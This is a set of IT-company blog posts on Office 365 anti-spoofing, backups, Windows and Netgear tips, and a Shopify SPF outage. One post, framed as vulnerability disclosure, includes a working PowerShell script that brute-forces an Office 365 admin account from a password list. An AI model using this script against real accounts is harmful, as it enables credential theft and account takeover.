What is Get-AntiPhishPolicy TreatSoftPassAsAuthenticated?


While reviewing Get-AntiPhishPolicy I wondered about the TreatSoftPassAsAuthenticated option.

The TreatSoftPassAsAuthenticated parameter specifies whether or not to respect the composite authentication softpass result. Valid values are:

$true: This is the default value.

$false: Only use this value when you want to enable more restrictive antispoofing filtering, because this value might cause false positives.

Note: This parameter corresponds to the Strict filtering value in the Office 365 admin center.

source: https://docs.microsoft.com/en-us/powershell/module/exchange/advanced-threat-protection/set-antiphishpolicy?view=exchange-ps

This then made me wonder about composite authentication and what a softpass is.

While SPF, DKIM, and DMARC are all useful by themselves, they don’t communicate enough authentication status in the event a message has no explicit authentication records. Therefore, Microsoft has developed an algorithm that combines multiple signals into a single value called Composite Authentication, or compauth for short. Customers in Office 365 have compauth values stamped into the Authentication-Results header in the message headers.

Authentication-Results:  compauth=<fail|pass|softpass|none> reason=<yyy>

CompAuth result Description
fail Message failed explicit authentication (sending domain published records explicitly in DNS) or implicit authentication (sending domain did not publish records in DNS, so Office 365 interpolated the result as if it had published records).
pass Message passed explicit authentication (message passed DMARC, or Best Guess Passed DMARC) or implicit authentication with high confidence (sending domain does not publish email authentication records, but Office 365 has strong backend signals to indicate the message is likely legitimate).
softpass Message passed implicit authentication with low-to-medium confidence (sending domain does not publish email authentication, but Office 365 has backend signals to indicate the message is legitimate but the strength of the signal is weaker).
none Message did not authenticate (or it did authenticate but did not align), but composite authentication not applied due to sender reputation or other factors.

Source:https://support.office.com/en-us/article/anti-spoofing-protection-in-office-365-d24bb387-c65d-486e-93e7-06a4f1a436c0

So essentially, a pass is softpass is when there are no DMARC records, but Office 365 is pretty sure that this domain is the appropriate sender. A pass is when either a DMARC record is published and it passes, or Microsoft is very sure the email is legitimate.

By default, softpass is not marked as junk. I agree with this setting, but wish pass would only be for 100% DMARC passes or an even higher level that was for 100% DMARC passes, maybe called hardpass. It’s relatively easy to find if DMARC passed in a message header, so not the end of the world, but I’m not a fan of giving a result of algorithmic learning the same level of certainty as a though-out, intentionally written, record.

Do you agree with Microsoft’s default here? Do you think there should be another level of pass?

Office 365 Vulnerable to Brute Force Attack via Powershell

Putting this together real quick. Hoping to get some publicity on it because I think it is a major vulnerability.

Today we were auditing a client’s security and discovered that Office 365 will let you brute force them, all day long. Seemingly without restriction.

I notified an Office 365 representative that this was an issue, and their solution was to enable two factor authentication. However, this doesn’t apply to a lot of admin accounts that exist on Office 365.

The process an attacker would use would be to figure out who the IT director is of a major company, put their email address in this script and test against a password list.


# Login to O365
Import-Module MSOnline

# Account you wish to brute force
$username = “admin@microsoft.com”
# Attempt logins using every password in your password list
$x=0
foreach ($password in get-content password_list.txt)
{
$x=$x+1;
Write-Host “Attempt #$x”
Write-Host “Trying password $password”
$password = $password | ConvertTo-SecureString -asPlainText -Force
$O365Cred = New-Object System.Management.Automation.PSCredential($username,$password)
$O365Session = New-PSSession –ConfigurationName Microsoft.Exchange -ConnectionUri https://ps.outlook.com/powershell -Credential $O365Cred -Authentication Basic -AllowRedirection
Connect-MsolService –Credential $O365Cred
#Check a command. If the command has output that means your password is good.
$Domains = Get-Msoldomain
if ($Domains) {
exit
}
}


It seems Office 365 is not restricting bad login attempts. I’ve been attempting to login for over 3 hours now and have passed 1000+ passwords. I’ve heard that they will reduce the speed at which you can login, but that doesn’t seem like the case based on my data.

Azure Active Directory shows sign in failures

…and even says that “Account is locked because user tried to sign in too many times with an incorrect user ID or password.” which is not true since I can still log in with that account.

Multifactor authentication does prevent this. When the password is guessed correctly I get a login box which forces 2FA on me. This tells me the password is right, I just need to get access to the user’s device, which is much harder from a distance.

Moral of this story, turn on 2FA for your Office 365 Admin accounts. Microsoft can you please do something about this?

Not Able To Send Email to Hilton.com

Recently Hilton.com made security changes to their email, preventing some domains from being able to send to it. This is a security improvement, but does have consequences for misconfigured email senders. This is likely a misconfiguration of your email. CSSI can work with you to configure your email so it can send to Hilton.com. Give us a call at 869-226-9222 to discuss an email audit for your email.

Hybrid Server Managed Backup Solutions

If a server does not have a backup and crashes, all data could be lost. Even if data could be recovered, data recovery can range from hundreds to thousands of dollars – and include possible downtime of several days or more. The hard drive that stores the data is a moving part, that will eventually deteriorate, fail, and require replacement. When this time comes it is very important to have a backup. (Proactive measures can be taken to determine when a drive is failing – which we cover with our Server Monitoring package)

A backup solution protects from data loss in the event of server failure. A managed backup solution provides monitoring of the backup – confirming it is working as expected. It is very important to monitor the backup solution for failures. It is common for a non-managed backup solution to have an issue and stop backing up, making the backup setup useless.  CSSI’s managed backup solution monitors the backup, confirming the backup is completing and the backup software is working appropriately.

CSSI recommends a hybrid local and cloud backup as this combination offers protection from most types of possible hardware or software failures. After the initial setup, CSSI will manage both the local and cloud backups for you – looking for issues on a daily basis and doing any maintenance necessary.

Local Backup: The local backup provides a complete backup of your server to an external hard drive or local backup server. A local backup has many advantages: Restoring from a local backup is faster than from a cloud backup. Additionally, local backup allows full restoration of an entire server, while a cloud backup typically provides file-level backup. A disadvantage of local backup is that it does not protect from fire or other damages to the hardware. To address this disadvantage, CSSI recommends the local backup drive be rotated out weekly to provide full offsite redundancy for your server. If a fire destroyed the backup drive you could restore the server from the offsite backup drive, but the files would be out of date. This is where cloud backup has advantages.

Cloud Backup: The cloud backup provides a file-level backup of your server to a secure and encrypted cloud storage. Cloud backup protects from physical destruction like tornadoes or fire and has the advantage of always being up-to-date. A disadvantage of cloud backup is that it can’t typically do full server backup – just file level.

Solution – Hybrid Managed Backup Solution (Local and Cloud Backup)

CSSI manages and provides all labor, hardware and software required for multiple levels of backup.  Protects the server, user information on server, and files.

  • Backup of server including different facets required for server
  • Managed – monitor the daily, weekly, and monthly operations of each backup level
  • All hardware and subscriptions provided and managed by CSSI
  • Multiple level backup AND multiple generation backup
    • Local Backups
      • Backup of everything listed below
      • Rotating hard drives (daily backup, approximately 2-month history kept, rotated onsite)
      • Drive rotated by designated client user (CSSI does all the server and software – client just has to plug in cable periodically)
    • Additional Cloud backups
      • All client data (file shares)
      • Does exclude some server/IT information
      • This additional redundancy is a cloud based backup service with additional daily backup and approximately 3 week history kept
    • Complete CSSI management of the backup process, ongoing audit and checks of backup
    • CSSI availability for support from simple deleted file restore to recovery of an entire server
    • Items to be backed up
      • Server Operating System
      • User database
      • Shared files
      • Server configuration information (also includes IT information and assets like DNS, DHCP, Group Policy and other data as appropriate)

Interested in securing your data? Contact CSSI, in Lexington, Kentucky, and a technician will reach out to you!

 

How To Get The Name of Your Computer

Here’s how to get your computer name. If you don’t know which version of Windows you are using see How to Tell Which Version of Windows You Are Running.

Windows 10:

  • Right click on the Start button
  • Click System
  • Under Device Name you can find your computer name

Windows 8.1:

  • Right click on the Start button
  • Click System
  • Under Computer name, domain, and workgroup settings, you can find your computer name

Windows 8:

  • Hover the mouse at the top right
  • Click the settings cog > PC info.
  • Under Computer name, domain, and workgroup settings, you can find your computer name

Windows 7:

  • Open System by clicking the Start button.
  • Right-click on Computer, and then clicking Properties
  • Under Computer name, domain, and workgroup settings, you can find your computer name

Windows Vista:

  • Open System by clicking the Start button.
  • Click on Control Panel > System and Maintenance, and then clicking System.
  • Your Computer Name is listed under Full Computer Name.

Windows XP:

  • Right-Click My Computer and Select Properties
  • Click the Computer Name tab.
  • Your Computer Name is listed under Full Computer Name.

Mac OS X 10.4 and later:

  • Launch your System Preferences.
  • Click on the Sharing pane.
  • Your Computer Name is listed at the top of the pane.

iOS

  • Launch your Settings app
  • Press General and then press About.
  • Your iOS device name will be at the top left of the screen.

Netgear “ACL is used by Class map or Interface” Error

Just posting this here since Google yielded no results. I was having trouble deleting access lists (for MAC authentication) on a Netgear GS752TP and was getting an error that said “ACL is used by Class map or Interface”. I thought it was because I had a MAC binding, but the MAC Binding Table had no entries. Turns out, I had some class-maps that didn’t clear and weren’t showing, for some reason or another, in the web interface.

The workaround is to go into MAC Binding Configuration and bind the ACL to the port, then unbind. How can you tell which ports are affected if they don’t show up in the web interface? Telnet to the switch and run show class-map

This will give you output with the ports that are binded.

Outlook 2007 Will Continue To Work With Office 365 After October 31, 2017

Microsoft has recently changed text on their RPC over HTTP End-Of-Life page that originally claimed it will not allow Outlook 2007 to connect to Office 365. The new text has been updated to say

RPC over HTTP, also known as Outlook Anywhere, is a legacy method of connectivity and transport between Outlook for Windows and Exchange. In May 2014, Microsoft introduced MAPI over HTTP as a replacement for RPC over HTTP.

Starting on October 31, 2017, RPC over HTTP will no longer be a supported protocol for accessing mail data from Exchange Online. Starting on this date, the following conditions will apply:

  1. Microsoft will not provide support for RPC over HTTP issues (regular or custom).
  2. No code fixes or updates to resolve problems that are unrelated to security will be released.

Additionally, for Office versions that support MAPI over HTTP, Microsoft may elect to override existing registry keys that customer are using in order to force RPC over HTTP use.

Keyword here: support. This essentially means that nothing will happen to users of Outlook 2007 and Office 365, but Microsoft will no longer support the protocol (AKA they won’t support Outlook 2007 connections)

It is still a good idea to move users away from Outlook 2007. We feel any calls to Office 365 with Outlook 2007 running will be met with resistance from the support staff. Additionally, Microsoft may change their stance on this in the future.

Use this Powershell script to check all your tenants for Outlook 2007 connections.


CSSI provides businesses with IT services including Office 365 support and migrations. Contact CSSI for more information on how you can improve your Office 365 infrastructure!

Example of how SonicWall Prevents Ransomware For Businesses

Bad Rabbit Ransomware Automatically Mitigated by SonicWall Capture Advanced Threat Protection

On Tuesday, Oct. 24, a new strand of ransomware named Bad Rabbit appeared in Russia and the Ukraine and spread throughout the day.

SonicWall Capture Labs threat researchers investigated Bad Rabbit and the proficiency of the SonicWall Capture Advanced Threat Protection (ATP) sandboxing service against the previously unknown ransomware. Analyzing three different Bad Rabbit samples, the multi-engine Capture ATP successfully stopped all three attacks.

The SonicWall Capture ATP sandboxing service is designed to provide real-time protection against new strains of malware even before signatures are available on firewalls.

In addition, the SonicWall Capture Labs released signatures to protect customers against Bad Rabbit malware. These signatures are available to SonicWall firewall customers with an active Gateway Security subscription (GAV/IPS) and are applied automatically. More info here.


CSSI is a SonicWall Partner and has many customers with SonicWall firewalls and active security subscriptions. CSSI technicians have training in SonicWall networking and have Certified SonicWall Security Administrator (CSSA). Contact us today to protect your business from ransomware!

 

Fix For Ctrl Shift V to Move Outlook Emails Stopped Working

Today I ran into a small issue where I couldn’t use ctrl+shift+v to move emails. Instead of giving me the move dialog, I was getting a new email with pasted text in it.

It turns out, this was because I recently installed, Clipdiary, a clipboard history utility for Windows.

To fix this, go to File – Options – Hot Keys. Put a check next to ‘Win’ on ‘Paste current clipboard contents as plain text’. As you can see, what you are doing is telling Clipdiary to not use Ctrl+Shift+V for pasting the clipboard contents as plain text (stealing the hotkey from Outlook), instead use Win+Ctrl+Shift+V.

Shopify breaks email for whole domain

Shopify and Google G Suite broke everything email:

Today we had a client that reported ALL internal email from one user to another user was going to SPAM folder.  Our monitoring had caught the issue as well, and we were working on fixing the issue.  So what happened to break all the email? First, the client’s email is hosted by G Suite.  After a bit of tracking, found out that Shopify SPF broke everything.  How exactly is it possible that Shopify broke the client’s G Suite internal user to user email?

SPF and DMARC

Our customer’s SPF record was: “v=spf1 include:shops.shopify.com include:_spf.google.com include:sendgrid.net ~all”  and our DMARC record was: “v=DMARC1; rua=mailto:secretkey@cssi.us; ruf=mailto:secretkey@cssi.us; p=quarantine; sp=none; fo=1;”

Earlier this week (up to yesterday) shops.shopify.com had an SPF record.  Today it does not.  Earlier this week, everything email was working well.  Today is not.  So what was happening today:

  1. One G Suite user would send email to another internal G Suite user (at the same company and same domain).
  2. The outgoing G Suite server would send it ‘out’ to the incoming G Suite server.
  3. The incoming G Suite server would then receive the email, look up the SPF record.
  4. Then it gets a little more complex – G Suite would “permerror” the entire SPF record lookup, just because one of the includes did not resolve.
  5. The receiving G Suite server would lookup the Dmarc – see our Quarantine policy and put the email in the spam folder.

Should G Suite have created a “permerror” and flagged the email (from G Suite mind you) just because one unrelated record (from Shopify) did not look up?  In my opinion NO!  RFC 7208 also has recommendations about ‘void’ lookups (aka RCODE 0 or 3), and the RFC does recommend limiting ‘void’ lookups to TWO before giving a “permerror”.  But it appears that G Suite is limiting to a single ‘void’ lookup before completely giving up and issuing a “permerror”.  Not good in this case!!

Of course the root problem was the Shopify SPF record disappearing and that record is required for the Internet to receive validated email.  But G Suite is still fragile as demonstrated by being broken so easily.  Still annoying that I had to a spend a couple of hours on this just to keep email flowing and inform everyone what was going on.  Shopify has to fix their problem, but it would be nice if Google updated code so it does not break G Suite when an external company makes a mistake.

 

 

Troubleshooting

We monitor all records and email, allowing us to catch the records issue quickly – but not before a few internal emails went to spam.  Worse is that some emails to customers (from GSuite, sendgrid.net and Shopify) were rejected outright – like purchase receipts!  This effected all email for the domain – how it was treated depended on the receiving email servers – some put it in Junk, some rejected the email outright.

Especially ironic that internal emails within the same domain were put in Spam folder.

Temporary Resolution

We removed Shopify from our SPF record and I recommend you do the same.  Then we had to set our DMARC record policy to “none”.  The first fixed the issue with receiving G Suite email.  The second is a fix for Shopify (otherwise those emails would have been sent to spam).  So for the moment that domain’s email sending is not as secure as we would like, but we have to wait for Shopify to fix things.

Permanent fix

I guess we have to keep checking the Shopify record and see if it gets fixed.  We will check it every day and see when they fix it.  (We also opened a ticket with Shopify which they said got ‘escalated’.)

As for Google – there is no easy way for us to externally know if they have updated the void lookup problem – but hopefully they will so this is not such a problem in the future.

Shopify Response

Update: Shopify got back to us and told us it was our fault and said the order of our SPF TXT record elements was wrong.  This is non-sense, email receivers evaluate all SPF “includes:”, regardless of order.  SHOPIFY has their SPF record for shops.shopify.com MISSSING IN ACTION and they need to put it back or everything will remain broken.

Why are some large companies that rely on email as a core part of their business so clueless about what is these days just basic functionality?